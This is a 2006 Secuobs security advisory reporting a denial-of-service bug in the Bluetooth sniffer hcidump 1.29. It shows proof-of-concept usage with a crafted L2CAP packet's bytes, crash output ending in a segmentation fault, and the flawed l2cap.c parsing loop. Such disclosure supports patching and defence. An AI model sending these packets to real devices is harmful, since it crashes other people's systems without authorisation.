<<< Date Index >>>     <<< Thread Index >>>

[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC



[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin@xxxxxxxxxxxx - Bug found with BSS 
v0.6 GPL fuzzer (Bluetooh Stack Smasher) 

BSS could be downloaded on 
http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13

> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8
Echo req: dlen 12
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    switch (hdr->code) {
    l2cap_cmd_hdr *hdr = frm->ptr;
    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
            raw_dump(level, frm);
    }
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);